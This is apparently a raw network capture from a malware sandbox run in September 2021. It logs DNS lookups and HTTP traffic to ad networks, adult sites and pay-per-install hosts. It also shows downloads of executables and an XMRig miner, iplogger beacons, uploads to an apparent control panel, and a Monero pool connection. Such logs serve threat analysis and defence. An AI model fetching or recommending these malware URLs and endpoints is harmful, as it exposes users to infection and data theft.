DNSssbsync.smartadserver.comRequestssbsync.smartadserver.comIN AResponsessbsync.smartadserver.comIN CNAMEssbsync-geo.smartadserver.comssbsync-geo.smartadserver.comIN CNAMEusersync-geo-global.usersync-prod-sas.akadns.netusersync-geo-global.usersync-prod-sas.akadns.netIN CNAMEssbsync-itx4.smartadserver.comssbsync-itx4.smartadserver.comIN A185.86.139.103ssbsync-itx4.smartadserver.comIN A185.86.139.104ssbsync-itx4.smartadserver.comIN A185.86.139.93ssbsync-itx4.smartadserver.comIN A185.86.139.94
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.245tk6if76q.ab1n.netIN A95.211.229.247
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNakV4Tkh4aVltSmpZV0pqWVRWbE9XUm1ZMk0xTmpGaE0yRTBOMk5oWlRnek5UWmxOQS0tfGh0dHBzOi8vY2Ftc29kYTEuY29tL3JlZGlyLz9pZD1leG9yZW1zb2RhbW9iaXBvcHVzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTczMjU0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8MjU4NTc4OXw0MzM1ODU0MnwxMXwyfDU3fDB8NTg4fDkyOTI3NHw5MHw3NXxVU0R8VVNEfDF8MXwyMnx8MXxVU0F8fDE2fDJ8MHx8YmEwNzdiMGM2OTVhODYwODQ2ZjdhMzQ4NTM3ZWY4NGV8ODg3MTljNmE1YmE4OTI1MmUxMDBlOWE0NDQ3YWEwNzd8MXwwfHhudWRlLnVzfDB8MHwwfDAuMTR8MXwwfGV4Y2hhbmdlX2xpbmt8MHwwfDB8LTF8MHwwfHx8MXwxNDQwfHwwfDB8MHw0NXwwfDB8MXwwfE9LfDcyYTg5NjRhYjc4YTY5YzFjMTIwOWQ1YTNiZGNiNjBlRequestGET /cimp.php?data=TVRZek1Ea3lNakV4Tkh4aVltSmpZV0pqWVRWbE9XUm1ZMk0xTmpGaE0yRTBOMk5oWlRnek5UWmxOQS0tfGh0dHBzOi8vY2Ftc29kYTEuY29tL3JlZGlyLz9pZD1leG9yZW1zb2RhbW9iaXBvcHVzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTczMjU0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8MjU4NTc4OXw0MzM1ODU0MnwxMXwyfDU3fDB8NTg4fDkyOTI3NHw5MHw3NXxVU0R8VVNEfDF8MXwyMnx8MXxVU0F8fDE2fDJ8MHx8YmEwNzdiMGM2OTVhODYwODQ2ZjdhMzQ4NTM3ZWY4NGV8ODg3MTljNmE1YmE4OTI1MmUxMDBlOWE0NDQ3YWEwNzd8MXwwfHhudWRlLnVzfDB8MHwwfDAuMTR8MXwwfGV4Y2hhbmdlX2xpbmt8MHwwfDB8LTF8MHwwfHx8MXwxNDQwfHwwfDB8MHw0NXwwfDB8MXwwfE9LfDcyYTg5NjRhYjc4YTY5YzFjMTIwOWQ1YTNiZGNiNjBl HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xnude.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:56:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A33%3A%226135e5c08c9ba4.793185392309183966%22%3B%7D; expires=Wed, 06 Sep 2023 09:56:16 GMT; path=; domain=.optnx.com;
Content-Encoding: gzip
-
DNS111.t.keepitpumpin.ioRequest111.t.keepitpumpin.ioIN AResponse111.t.keepitpumpin.ioIN A212.83.141.61
-
DNSvarmisende.comRequestvarmisende.comIN AResponse
-
DNSvarmisende.comRequestvarmisende.comIN AResponse
-
DNSfernandomayol.comRequestfernandomayol.comIN AResponse
-
DNSnextlytm.comRequestnextlytm.comIN AResponse
-
DNSpeople4jan.comRequestpeople4jan.comIN AResponse
-
DNSloadm.exelator.comRequestloadm.exelator.comIN AResponseloadm.exelator.comIN CNAMEloadus.tm.ssl.exelator.comloadus.tm.ssl.exelator.comIN CNAMEglobal.load.exelator.comglobal.load.exelator.comIN CNAMEload-usw2.exelator.comload-usw2.exelator.comIN A44.238.141.43
-
DNSasfaltwerk.comRequestasfaltwerk.comIN AResponse
-
DNSssum-sec.casalemedia.comRequestssum-sec.casalemedia.comIN AResponsessum-sec.casalemedia.comIN CNAMEssum-sec.casalemedia.com.edgekey.netssum-sec.casalemedia.com.edgekey.netIN CNAMEe8037.g.akamaiedge.nete8037.g.akamaiedge.netIN A2.18.99.184
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSsync-tm.everesttech.netRequestsync-tm.everesttech.netIN AResponsesync-tm.everesttech.netIN CNAMEsync.tubemogul.comsync.tubemogul.comIN CNAMEsyncf.tubemogul.comsyncf.tubemogul.comIN CNAMEh2.shared.global.fastly.neth2.shared.global.fastly.netIN A151.101.2.49h2.shared.global.fastly.netIN A151.101.66.49h2.shared.global.fastly.netIN A151.101.130.49h2.shared.global.fastly.netIN A151.101.194.49
-
DNSfreejav.ruRequestfreejav.ruIN AResponsefreejav.ruIN A167.86.103.60
-
GEThttp://freejav.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: freejav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:57:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSmatch.prod.bidr.ioRequestmatch.prod.bidr.ioIN AResponsematch.prod.bidr.ioIN A34.197.23.139match.prod.bidr.ioIN A52.200.35.182match.prod.bidr.ioIN A3.92.230.107match.prod.bidr.ioIN A35.174.180.41match.prod.bidr.ioIN A52.204.32.76match.prod.bidr.ioIN A3.215.252.168match.prod.bidr.ioIN A52.6.110.71match.prod.bidr.ioIN A3.90.193.194
-
GEThttp://nsparket.top/redirect?tid=917720RequestGET /redirect?tid=917720 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://sexy-wife.com/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:58:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1204aa07efb15ce7cbe8a5a185a41b21
Host: 185.215.113.202
Content-Length: 48158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:58:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
GEThttp://vexacion.com/afu.php?zoneid=1492888&var=3RequestGET /afu.php?zoneid=1492888&var=3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; oaidts=1630921094
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:58:15 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: bb048636eaf5b5d5b490513ef09499a7
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; expires=Tue, 06 Sep 2022 09:58:15 GMT; path=/
Set-Cookie: oaidts=1630921094; expires=Tue, 06 Sep 2022 09:58:15 GMT; path=/
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsync.technoratimedia.comRequestsync.technoratimedia.comIN AResponsesync.technoratimedia.comIN CNAMEadserver.technoratimedia.comadserver.technoratimedia.comIN CNAMEv04.cap-ash1.technoratimedia.comv04.cap-ash1.technoratimedia.comIN A150.136.156.92
-
DNSapi-web.napster.comRequestapi-web.napster.comIN AResponseapi-web.napster.comIN CNAMEsecure-www.napster.zr.edgekey.netsecure-www.napster.zr.edgekey.netIN CNAMEe5701.ce.akamaiedge.nete5701.ce.akamaiedge.netIN A23.51.122.14
-
DNS113.t.keepitpumpin.ioRequest113.t.keepitpumpin.ioIN AResponse113.t.keepitpumpin.ioIN A212.83.164.166
-
DNS110.t.keepitpumpin.ioRequest110.t.keepitpumpin.ioIN AResponse110.t.keepitpumpin.ioIN A163.172.204.15
-
127.0.0.1:49236 -
127.0.0.1:49238
-
104.21.87.76:80http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=150&oname[]=03Sep0330PM_UPD3Sep&oname[]=7&oname[]=1&oname[]=3&oname[]=2&oname[]=4&oname[]=5&cnt=6http
HTTP Request
GET http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=150&oname[]=03Sep0330PM_UPD3Sep&oname[]=7&oname[]=1&oname[]=3&oname[]=2&oname[]=4&oname[]=5&cnt=6HTTP Response
200 -
172.67.146.70:443https://a.goatgame.co/userf/dat/sqlite.dlltls, http
HTTP Request
GET https://a.goatgame.co/userf/dat/2302/sqlite.datHTTP Response
200HTTP Request
GET https://a.goatgame.co/userf/dat/sqlite.dllHTTP Response
200 -
162.0.213.132:80http://safialinks.com/Installer_Provider/UltraMediaBurner.exehttp
HTTP Request
HEAD http://safialinks.com/Installer_Provider/UltraMediaBurner.exeHTTP Response
200HTTP Request
GET http://safialinks.com/Installer_Provider/UltraMediaBurner.exeHTTP Response
200 -
74.114.154.22:443https://romkaxarit.tumblr.com/tls, http
HTTP Request
GET https://romkaxarit.tumblr.com/ -
162.0.210.44:443https://connectini.net/Series/SuperNitou.phptls, http
HTTP Request
POST https://connectini.net/Series/SuperNitou.phpHTTP Response
200 -
162.159.134.233:443https://cdn.discordapp.com/attachments/873244194234318850/883286025894522900/pctool.exetls, http
HTTP Request
GET https://cdn.discordapp.com/attachments/873244194234318850/883286025894522900/pctool.exeHTTP Response
200 -
162.0.213.132:80http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/post-install-provider/r2dcfcbx72q3cxze.exehttp
HTTP Request
GET http://safialinks.com/Widgets/ultramediaburner.exeHTTP Response
200HTTP Request
GET http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/cpm-provider/nfdbssmwan23dzjn.exeHTTP Response
200HTTP Request
GET http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/kenpachi/5d3cdh4z6b5ytg2t.exeHTTP Response
200HTTP Request
GET http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/post-install-provider/r2dcfcbx72q3cxze.exeHTTP Response
200 -
162.0.220.187:80http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeghttp
HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200 -
104.21.20.198:443https://qwertys.info/dcc7975c8a99514da06323f0994cd79b.exetls, http
HTTP Request
GET https://qwertys.info/dcc7975c8a99514da06323f0994cd79b.exeHTTP Response
302 -
88.99.66.31:443https://iplogger.org/1cmAy7tls, http
HTTP Request
GET https://iplogger.org/1cmAy7HTTP Response
200 -
172.67.193.86:443https://timpler.info/dcc7975c8a99514da06323f0994cd79b.exetls, http
HTTP Request
GET https://timpler.info/dcc7975c8a99514da06323f0994cd79b.exeHTTP Response
200 -
142.250.179.132:80http://www.google.com/http
HTTP Request
GET http://www.google.com/HTTP Response
200 -
162.0.210.44:443https://connectini.net/Series/publisher/1/NL.jsontls, http
HTTP Request
POST https://connectini.net/Series/Conumer4Publisher.phpHTTP Response
200HTTP Request
GET https://connectini.net/Series/publisher/1/NL.jsonHTTP Response
200 -
172.67.141.201:443gavenetwork.bar
-
46.8.29.181:80http://cleaner-partners.biz/check.php?pub=mixshophttp
HTTP Request
GET http://cleaner-partners.biz/check.php?pub=mixshopHTTP Response
200 -
104.21.70.98:443https://live.goatgame.live/userf/dat/sqlite.dlltls, http
HTTP Request
GET https://live.goatgame.live/userf/dat/3002/sqlite.datHTTP Response
200HTTP Request
GET https://live.goatgame.live/userf/dat/sqlite.dllHTTP Response
200 -
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
104.21.13.27:80http://liveme31.com/74.exehttp
HTTP Request
HEAD http://liveme31.com/74.exeHTTP Response
200HTTP Request
GET http://liveme31.com/74.exeHTTP Response
200 -
188.119.65.241:80http://downloadlog.com/74.asdffhttp
HTTP Request
GET http://downloadlog.com/74.asdffHTTP Response
200 -
104.21.41.27:443gavenetwork.bar
-
192.243.59.13:443https://www.profitabletrustednetwork.com/e2q8zu9hu?shu=bf734f0c28c3bab65644afe1ee06e32c6372d5d2a79ba48839e61a5441b407952ab36ac731846c543c720fd7bc75c0e1ecca90315f261424aa8e9a347af8efabb8552ab39595cbad374e8c0ba81c013f70df457b&pst=1630920689&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6tls, http
HTTP Request
GET https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6HTTP Response
200HTTP Request
GET https://www.profitabletrustednetwork.com/e2q8zu9hu?shu=bf734f0c28c3bab65644afe1ee06e32c6372d5d2a79ba48839e61a5441b407952ab36ac731846c543c720fd7bc75c0e1ecca90315f261424aa8e9a347af8efabb8552ab39595cbad374e8c0ba81c013f70df457b&pst=1630920689&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6HTTP Response
302 -
192.243.59.13:443www.profitabletrustednetwork.comtls
-
104.21.6.118:80http://nopedope1.com/gate2.php?a=true&ssid=74http
HTTP Request
GET http://nopedope1.com/hit.php?a=%7BqWUxIe4wVOs6owed8toA6%7Did=74HTTP Response
200HTTP Request
GET http://nopedope1.com/gate2.php?a=true&ssid=74HTTP Response
200 -
88.99.66.31:443https://iplogger.org/1keUt7tls, http
HTTP Request
GET https://iplogger.org/1keUt7HTTP Response
200 -
104.21.91.222:80http://maf-pub.com/xxx/xxx.txthttp
HTTP Request
GET http://maf-pub.com/xxx/xxx.txtHTTP Response
200 -
188.119.65.241:80http://primods.com/kali/7.binhttp
HTTP Request
GET http://primods.com/kali/7.binHTTP Response
200 -
138.197.221.170:443starlightwin.infotls
-
138.197.221.170:443https://starlightwin.info/click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=13c227e79ed0ae9800e6f2abfbc960b4&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=24&BANNER_ID=1466549tls, http
HTTP Request
GET https://starlightwin.info/click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=13c227e79ed0ae9800e6f2abfbc960b4&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=24&BANNER_ID=1466549HTTP Response
302 -
138.68.233.239:443ihotdates.comtls
-
138.68.233.239:443ihotdates.comtls
-
138.68.233.239:443ihotdates.comtls
-
138.68.233.239:443ihotdates.comtls
-
138.68.233.239:443ihotdates.comtls
-
138.68.233.239:443ihotdates.comtls
-
138.68.233.239:443ihotdates.com
-
138.68.233.239:443ihotdates.com
-
172.67.141.201:443https://gavenetwork.bar/?user_auth=p10_4tls, http
HTTP Request
GET https://gavenetwork.bar/?user_auth=p10_2HTTP Response
200HTTP Request
GET https://gavenetwork.bar/?user_auth=p10_3HTTP Response
200HTTP Request
GET https://gavenetwork.bar/?user_auth=p10_4HTTP Response
200 -
185.215.113.202:80http://185.215.113.202/PmVc3sOf/index.php?scr=1http
HTTP Request
POST http://185.215.113.202/PmVc3sOf/index.php?scr=1HTTP Response
200 -
185.215.113.202:80http://185.215.113.202/PmVc3sOf/index.phphttp
HTTP Request
POST http://185.215.113.202/PmVc3sOf/index.phpHTTP Response
200 -
172.67.141.201:443https://gavenetwork.bar/?user_auth=p10_6tls, http
HTTP Request
GET https://gavenetwork.bar/?user_auth=p10_5HTTP Response
200HTTP Request
GET https://gavenetwork.bar/?user_auth=p10_6HTTP Response
200 -
88.99.66.31:443https://iplogger.org/1c2My7tls, http
HTTP Request
GET https://iplogger.org/1c2My7HTTP Response
200 -
88.99.66.31:443https://iplogger.org/1c5My7tls, http
HTTP Request
GET https://iplogger.org/1c5My7HTTP Response
200 -
185.215.113.104:18754
-
104.21.34.192:443https://get-europe-group.bar/tls, http
HTTP Request
GET https://get-europe-group.bar/api.php?getusersHTTP Response
200HTTP Request
GET https://get-europe-group.bar/api.phpHTTP Response
200HTTP Request
POST https://get-europe-group.bar/HTTP Response
200 -
193.56.146.78:51487
-
95.181.157.102:40915
-
104.26.12.31:443https://api.ip.sb/geoiptls, http
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200 -
185.65.135.234:58899https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrigtls, http
HTTP Request
GET https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrigHTTP Response
200 -
104.26.12.31:443https://api.ip.sb/geoiptls, http
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200 -
104.26.12.31:443https://api.ip.sb/geoiptls, http
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200 -
104.192.141.1:443https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrigtls, http
HTTP Request
GET https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrigHTTP Response
200 -
204.79.197.200:443ieonline.microsoft.comtls
-
204.79.197.200:443https://ieonline.microsoft.com/iedomainsuggestions/ie11/suggestions.ja-JPtls, http
HTTP Request
GET https://ieonline.microsoft.com/iedomainsuggestions/ie11/suggestions.ja-JPHTTP Response
200 -
104.23.99.190:443pastebin.comtls
-
217.182.169.148:14433xmr-eu1.nanopool.orgtls -
162.0.210.44:443https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_kosmedia_Xtextls, http
HTTP Request
POST https://connectini.net/Series/Conumer2kenpachi.phpHTTP Response
200HTTP Request
GET https://connectini.net/Series/kenpachi/2/goodchannel/NL.jsonHTTP Response
200HTTP Request
GET https://connectini.net/Series/configPoduct/2/goodchannel.jsonHTTP Response
200HTTP Request
GET https://connectini.net/ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_notezzlylHTTP Response
200HTTP Request
GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lyloutta_traidinganalyzerwwHTTP Response
200HTTP Request
GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_AskhelpfinderWWHTTP Response
200HTTP Request
GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lyloutta_PCCleanerPROHTTP Response
200HTTP Request
GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanagerHTTP Response
200HTTP Request
GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_kosmedia_XtexHTTP Response
200 -
162.0.220.187:80http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeghttp
HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200HTTP Request
POST http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegHTTP Response
200 -
194.145.227.159:80http://194.145.227.159/pub.php?pub=fivehttp
HTTP Request
GET http://194.145.227.159/pub.php?pub=fiveHTTP Response
200HTTP Request
GET http://194.145.227.159/pub.php?pub=fiveHTTP Response
200 -
172.67.148.61:443https://source3.boys4dayz.com/installer.exetls, http
HTTP Request
GET https://source3.boys4dayz.com/installer.exeHTTP Response
200 -
104.21.62.66:443https://aa.goatgamea.com/userdow/25/anyname.exetls, http
HTTP Request
GET https://aa.goatgamea.com/userdow/25/anyname.exeHTTP Response
302 -
104.21.28.120:443https://bb.goatgameb.com/userdow/25/ff026d492a4e3c82042fae97cbf29e73.exetls, http
HTTP Request
GET https://bb.goatgameb.com/userdow/25/ff026d492a4e3c82042fae97cbf29e73.exeHTTP Response
200 -
88.99.66.31:443https://iplogger.org/1Xxky7tls, http
HTTP Request
GET https://iplogger.org/1Xxky7HTTP Response
200 -
111.90.156.46:80http://fsstoragecloudservice.com/campaign3/autosubplayer.exehttp
HTTP Request
GET http://fsstoragecloudservice.com/campaign3/autosubplayer.exeHTTP Response
200 -
104.21.79.144:443https://a.goatgame.co/userf/dat/sqlite.dlltls, http
HTTP Request
GET https://a.goatgame.co/userf/dat/25/sqlite.datHTTP Response
200HTTP Request
GET https://a.goatgame.co/userf/dat/sqlite.dllHTTP Response
200 -
5.230.68.37:80http://cleaner-partners.biz/check.php?pub=eufivehttp
HTTP Request
GET http://cleaner-partners.biz/stats/1.php?pub=/eufive%20HTTP Response
200HTTP Request
GET http://cleaner-partners.biz/check.php?pub=eufiveHTTP Response
200 -
5.230.68.37:80http://cleaner-partners.biz/check.php?pub=mixfivehttp
HTTP Request
GET http://cleaner-partners.biz/stats/1.php?pub=/mixfive%20HTTP Response
200HTTP Request
GET http://cleaner-partners.biz/check.php?pub=mixfiveHTTP Response
200 -
185.215.113.202:80http://185.215.113.202/PmVc3sOf/index.php?scr=1http
HTTP Request
POST http://185.215.113.202/PmVc3sOf/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.202/PmVc3sOf/index.php?scr=1HTTP Response
200 -
185.177.125.94:57832
-
104.26.13.31:443https://api.ip.sb/geoiptls, http
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200 -
192.243.59.13:443https://www.profitabletrustednetwork.com/b1fsmdd9m?shu=7688577ea216eef62501967e4ddba1b72103245c15cb164eff517b4a445e2062d0e638af25719f80b561b15d5f1bba38ecaaf5274572c61b615f74bc3a7f84ecebe23869223e1978bb00606b59c93444c68dc8b2&pst=1630920916&rmtc=t&uuid=&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dadtls, http
HTTP Request
GET https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadHTTP Response
200HTTP Request
GET https://www.profitabletrustednetwork.com/b1fsmdd9m?shu=7688577ea216eef62501967e4ddba1b72103245c15cb164eff517b4a445e2062d0e638af25719f80b561b15d5f1bba38ecaaf5274572c61b615f74bc3a7f84ecebe23869223e1978bb00606b59c93444c68dc8b2&pst=1630920916&rmtc=t&uuid=&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dadHTTP Response
302 -
192.243.59.13:443www.profitabletrustednetwork.comtls
-
104.21.235.54:443https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_color3.pngtls, http
HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/libs/jquery.min.jsHTTP Response
200HTTP Request
GET https://theonlygames.com/awpx_click.js?v=005HTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_color3.pngHTTP Response
200 -
104.21.235.54:443https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/play.pngtls, http
HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783HTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/css/main.cssHTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black3.pngHTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/play.pngHTTP Response
200 -
104.21.235.54:443https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black1.pngtls, http
HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/scripts/main.jsHTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black1.pngHTTP Response
200 -
104.21.235.54:443https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/favft.pngtls, http
HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/bg_layer.pngHTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_color1.pngHTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/bg.jpgHTTP Response
200HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/favft.pngHTTP Response
200 -
104.21.235.54:443https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black2.pngtls, http
HTTP Request
GET https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black2.pngHTTP Response
200 -
